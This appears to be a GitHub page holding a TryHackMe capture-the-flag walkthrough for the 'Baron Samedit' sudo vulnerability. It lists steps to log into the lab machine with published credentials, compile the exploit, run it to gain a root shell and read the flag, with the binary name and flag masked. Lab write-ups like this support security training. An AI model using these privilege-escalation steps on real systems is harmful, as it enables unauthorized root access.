Skip to content

Files

Latest commit

f867dd7 · Feb 3, 2021

History

History

Baron-Samedit

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Feb 3, 2021

Baron Samedit

  • Deployed!

    no answer needed
    
  • After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?

    • ssh tryhackme@<TARGET_IP> and enter the password tryhackme
    • cd Exploit
    • make
    • sudo-h****************
  • Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?

    • cat /etc/os-release*
    • ./sudo-h**************** 0
    • cd /root
    • cat flag.txt
    • THM{********************************}